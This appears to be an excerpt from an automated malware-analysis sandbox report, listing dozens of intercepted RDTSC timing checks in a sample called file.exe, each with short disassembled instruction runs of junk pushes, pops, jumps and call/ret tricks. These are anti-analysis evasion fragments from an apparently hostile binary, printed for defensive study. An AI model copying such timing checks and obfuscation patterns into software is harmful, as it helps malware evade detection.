                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B1A9 second address: A0B1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4041C second address: A40420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40420 second address: A4042A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4089B second address: A408A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A408A8 second address: A408AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A408AE second address: A408B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A408B3 second address: A408CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2C7h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40C3C second address: A40C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40C42 second address: A40C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40C65 second address: A40C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F3778D7C02Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A424E3 second address: A42532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F3778D7B2B6h 0x0000000b jmp 00007F3778D7B2C5h 0x00000010 jmp 00007F3778D7B2BFh 0x00000015 jmp 00007F3778D7B2BEh 0x0000001a popad 0x0000001b pop ebx 0x0000001c jng 00007F3778D7B2DDh 0x00000022 push eax 0x00000023 push edx 0x00000024 jng 00007F3778D7B2B6h 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15235 second address: A15239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15239 second address: A1525A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F3778D7B2CBh 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1525A second address: A1526C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jnc 00007F3778D7C026h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1526C second address: A152A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C6h 0x00000007 jmp 00007F3778D7B2C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A152A4 second address: A152AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A152AA second address: A152BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3778D7B2B6h 0x0000000d jns 00007F3778D7B2B6h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A152BD second address: A152C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A495FC second address: A49621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3778D7B2C3h 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F3778D7B2B6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49621 second address: A4962B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3778D7C026h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4962B second address: A49635 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3778D7B2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49FD9 second address: A49FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3778D7C038h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A8DF second address: A4A915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3778D7B2C8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3778D7B2C0h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A915 second address: A4A91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3778D7C026h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4AE34 second address: A4AE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7B2C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B4D9 second address: A4B4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B4E0 second address: A4B4E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B4E6 second address: A4B4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B4EA second address: A4B50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B50A second address: A4B517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3778D7C026h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B5A8 second address: A4B60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3778D7B2B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov esi, dword ptr [ebp+122D28CAh] 0x0000002a sbb esi, 0B811BBAh 0x00000030 push eax 0x00000031 pushad 0x00000032 jp 00007F3778D7B2CCh 0x00000038 jmp 00007F3778D7B2C6h 0x0000003d push eax 0x0000003e push edx 0x0000003f jng 00007F3778D7B2B6h 0x00000045 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B9A3 second address: A4B9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BF84 second address: A4C020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, 30B89CCDh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F3778D7B2B8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B82h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F3778D7B2B8h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 add dword ptr [ebp+122D1C0Bh], ecx 0x00000056 xchg eax, ebx 0x00000057 pushad 0x00000058 pushad 0x00000059 jmp 00007F3778D7B2BBh 0x0000005e push eax 0x0000005f pop eax 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3778D7B2C6h 0x00000068 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C923 second address: A4C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3778D7C02Ah 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F3778D7C026h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C93D second address: A4C954 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F3778D7B2BAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C954 second address: A4C99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push ebx 0x00000008 mov si, A87Ch 0x0000000c pop edi 0x0000000d push 00000000h 0x0000000f movsx esi, ax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F3778D7C028h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e sub esi, 08F2D0D8h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jp 00007F3778D7C028h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C99D second address: A4C9A7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3778D7B2BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D98E second address: A4D9F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 6E317DC6h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D2104h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F3778D7C028h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D2BC6h] 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007F3778D7C036h 0x00000040 jmp 00007F3778D7C02Bh 0x00000045 popad 0x00000046 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D9F6 second address: A4DA09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F3778D7B2B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E435 second address: A4E445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jnp 00007F3778D7C034h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E445 second address: A4E449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF2D second address: A4EF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ECA8 second address: A4ECB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF33 second address: A4EF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50E04 second address: A50E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50E08 second address: A50E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c xor dword ptr [ebp+122D597Fh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F3778D7C028h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e je 00007F3778D7C02Ah 0x00000034 mov di, 752Ch 0x00000038 mov dword ptr [ebp+12460173h], eax 0x0000003e xchg eax, ebx 0x0000003f js 00007F3778D7C030h 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 pop esi 0x00000049 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50B7B second address: A50B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51642 second address: A51651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552B1 second address: A552B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A561C8 second address: A561CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552B7 second address: A552C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57322 second address: A5732C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A581D3 second address: A581DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5732C second address: A57345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3778D7C026h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5537D second address: A55381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57345 second address: A5734B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55381 second address: A55385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5734B second address: A573C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F3778D7C026h 0x00000009 jne 00007F3778D7C026h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 sbb bx, 3672h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+122D3468h], ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov bx, ax 0x0000002f mov eax, dword ptr [ebp+122D0975h] 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F3778D7C028h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f push FFFFFFFFh 0x00000051 sub edi, dword ptr [ebp+122D27E0h] 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F3778D7C038h 0x0000005f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A573C8 second address: A573E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7B2C5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A573E2 second address: A57402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3778D7C034h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57402 second address: A5741A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A3B6 second address: A5A3BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B41B second address: A5B45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, EE22h 0x0000000e mov di, si 0x00000011 push 00000000h 0x00000013 mov ebx, eax 0x00000015 push 00000000h 0x00000017 js 00007F3778D7B2BCh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jne 00007F3778D7B2B6h 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B45D second address: A5B463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A59D second address: A5A642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3778D7B2C4h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 xor dword ptr [ebp+122D2727h], edx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bx, ax 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F3778D7B2B8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov bx, di 0x00000048 mov eax, dword ptr [ebp+122D097Dh] 0x0000004e mov ebx, dword ptr [ebp+122D2B76h] 0x00000054 mov ebx, dword ptr [ebp+122D2BDEh] 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F3778D7B2B8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 00000015h 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a jg 00007F3778D7B2B6h 0x00000080 jg 00007F3778D7B2B6h 0x00000086 popad 0x00000087 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B463 second address: A5B48D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jp 00007F3778D7C026h 0x00000015 pop edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C55D second address: A5C561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6A9 second address: A5B6AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C561 second address: A5C57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007F3778D7B2B6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F3778D7B2B6h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6AD second address: A5B6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D6DF second address: A5D6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C78F second address: A5C795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C795 second address: A5C833 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx ebx, di 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov bx, 99CCh 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F3778D7B2B8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jo 00007F3778D7B2C2h 0x00000040 jne 00007F3778D7B2BCh 0x00000046 mov eax, dword ptr [ebp+122D0175h] 0x0000004c pushad 0x0000004d mov bx, cx 0x00000050 cmc 0x00000051 popad 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F3778D7B2B8h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 00000016h 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e movsx edi, dx 0x00000071 mov di, bx 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F3778D7B2C9h 0x0000007c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F5C1 second address: A5F60A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jo 00007F3778D7C030h 0x0000000e pushad 0x0000000f or dword ptr [ebp+124755D3h], ebx 0x00000015 mov ecx, edi 0x00000017 popad 0x00000018 push 00000000h 0x0000001a mov edi, 28F32779h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F3778D7C028h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f pushad 0x00000040 popad 0x00000041 pop esi 0x00000042 rdtsc
